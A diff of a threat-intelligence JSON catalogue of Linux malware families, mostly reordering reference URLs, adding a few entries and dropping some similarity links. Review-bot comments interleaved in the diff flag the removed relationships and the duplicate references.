+ "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori",
"http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
+ "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/",
"https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
- "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/"
+ "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1ad4697b-3388-48ed-8621-85abebf5dbbf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
"value": "Satori"
},
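Review bot: besides the refs reorder, this hunk silently drops Satori's `related` block, the `similar` link to `1ad4697b-3388-48ed-8621-85abebf5dbbf` tagged almost-certain, with nothing replacing it; either the relationship was intentionally retired (say so in the commit message) or the generator lost it, in which case consumers relying on galaxy relationships lose a documented link. Relationship deletions are worth splitting into their own commit so they can be reviewed separately from reference reshuffles.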
@@ -5918,8 +6428,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sbidiot",
- "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
"https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/",
+ "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
"https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/"
],
"synonyms": [],
@@ -6001,9 +6511,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sowat",
- "https://twitter.com/bkMSFT/status/1417823714922610689",
"https://twitter.com/billyleonard/status/1417910729005490177",
"https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003",
+ "https://twitter.com/bkMSFT/status/1417823714922610689",
"https://imp0rtp3.wordpress.com/2021/11/25/sowat/"
],
"synonyms": [],
@@ -6057,9 +6567,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos",
- "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
"https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html"
],
"synonyms": [],
"type": []
@@ -6078,15 +6588,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f258f96c-8281-4b24-8aa7-4e23d1a5540e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "275d65b9-0894-4c9b-a255-83daddb2589c",
"value": "SSHDoor"
},
@@ -6095,12 +6596,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/",
+ "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/",
"https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/",
+ "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/",
"https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/",
- "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/",
- "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"
],
"synonyms": [],
"type": []
@@ -6113,10 +6614,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi",
- "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/",
"https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://www.mandiant.com/resources/unc2891-overview"
+ "https://www.mandiant.com/resources/unc2891-overview",
+ "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/"
],
"synonyms": [],
"type": []
@@ -6165,15 +6666,28 @@
"uuid": "d2748a0c-8739-4006-95c4-bdf6350d7fa9",
"value": "Suterusu"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sword2033",
+ "https://unit42.paloaltonetworks.com/alloy-taurus/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9c1a32c7-45b4-4d3a-9d15-300b353f32a7",
+ "value": "Sword2033"
+ },
{
"description": "A malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods for hiding its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, 3) a set of libpcap functions.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote",
- "https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat",
+ "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/",
"https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/",
- "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote",
- "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/"
+ "https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat",
+ "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote"
],
"synonyms": [],
"type": []
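Review bot: the Symbiote refs keep both https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ and the same URL without the trailing slash, which is one article listed twice; normalise trailing slashes in the generator and drop the duplicate. The new Sword2033 entry ships with `"description": ""` and a single Unit 42 ref; if the Malpedia description is empty upstream that is expected, but confirm it rather than publishing a blank by default.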
@@ -6186,9 +6700,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysjoker",
+ "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
"https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/",
- "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html"
+ "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/"
],
"synonyms": [],
"type": []
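Review bot: the re-added VMware ref https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html carries a percent-encoded U+202F (narrow no-break space) at the start of the slug. If that is how the post was published, keep the bytes exactly as they are; any URL normalisation or decoding step in the generator will turn it into a broken link, so a resolve check after regeneration is worth having for refs like this one.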
@@ -6201,9 +6715,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysrvhello",
+ "https://www.lacework.com/sysrv-hello-expands-infrastructure/",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
"https://www.riskiq.com/blog/external-threat-management/sysrv-hello-cryptojacking-botnet/",
- "https://www.lacework.com/sysrv-hello-expands-infrastructure/",
"https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet"
],
"synonyms": [
@@ -6219,28 +6733,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",
- "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://unit42.paloaltonetworks.com/atoms/thieflibra/",
- "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
- "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
- "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
- "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
- "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
- "https://unit42.paloaltonetworks.com/atoms/adept-libra/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf",
"https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/",
"https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/",
- "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
- "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
"https://sysdig.com/blog/teamtnt-aws-credentials/",
- "https://tolisec.com/active-crypto-mining-operation-by-teamtnt/",
- "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf",
- "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
"https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
"https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools",
- "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://tolisec.com/active-crypto-mining-operation-by-teamtnt/",
+ "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html",
+ "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://unit42.paloaltonetworks.com/atoms/adept-libra/",
+ "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
+ "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
+ "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html",
+ "https://unit42.paloaltonetworks.com/atoms/thieflibra/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
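Review bot: the TeamTNT refs list both https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials and https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/, which by their slugs are the same Cado article at an old and a new path; keep the one that currently resolves. The Intezer pair (the 2021/09 TeamTNT-Cryptomining-Explosion.pdf and the blog post of the same title) is a similar candidate if the PDF is only an export of the post.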
@@ -6307,30 +6821,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://twitter.com/ESETresearch/status/1382054011264700416",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
- "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
"https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
"https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf"
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
+ "https://twitter.com/ESETresearch/status/1382054011264700416",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a71ed71f-b8f4-416d-9c57-910a42e59430",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "592f7cc6-1e07-4d83-8082-aef027e9f1e2",
"value": "TSCookie"
},
@@ -6352,28 +6858,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
- "https://sysdig.com/blog/muhstik-malware-botnet-analysis/",
- "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
- "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt",
- "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
- "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
+ "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/",
"https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/",
"https://blog.aquasec.com/fileless-malware-container-security",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
- "https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/",
- "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
"https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
+ "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
+ "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt",
+ "https://sysdig.com/blog/muhstik-malware-botnet-analysis/",
"https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
"http://get.cyberx-labs.com/radiation-report",
- "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/"
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
+ "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/"
],
"synonyms": [
"Amnesia",
@@ -6389,7 +6895,8 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat",
+ "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html"
],
"synonyms": [],
"type": []
@@ -6402,23 +6909,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon",
- "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/",
+ "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html"
],
"synonyms": [
"Espeon"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2a18f5dd-40fc-444b-a7c6-85f94b3eee13",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460",
"value": "Umbreon"
},
@@ -6453,7 +6951,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_005",
- "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/"
+ "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/",
+ "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/"
],
"synonyms": [],
"type": []
@@ -6474,13 +6973,27 @@
"uuid": "61a36688-0a4f-4899-8b17-ca0d5ff7e800",
"value": "Unidentified ELF 006 (Tox Backdoor)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vault8_hive",
+ "https://wikileaks.org/vault8/",
+ "https://github.com/infoskirmish/hive"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "721fa6d1-da73-4dd4-9154-a60ff4607467",
+ "value": "Hive (Vault 8)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike",
- "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/",
"https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html"
],
"synonyms": [],
@@ -6494,44 +7007,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter",
- "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
- "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter",
- "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
- "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
+ "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html",
"https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/",
- "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
- "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
- "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
- "https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en",
+ "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
+ "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
"https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html",
"https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html",
- "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
+ "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
+ "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
+ "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter",
"https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf",
"https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html"
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "895d769e-b288-4977-a4e1-7d64eb134bf9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500",
"value": "VPNFilter"
},
@@ -6553,27 +7057,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "59266c02-e3c8-47a6-b00c-bbb50c8975e9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "93ffafbd-a8af-4164-b3ab-9b21e6d09232",
"value": "WellMail"
},
@@ -6582,24 +7077,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
- "https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
- "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://community.riskiq.com/article/541a465f/description",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf"
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
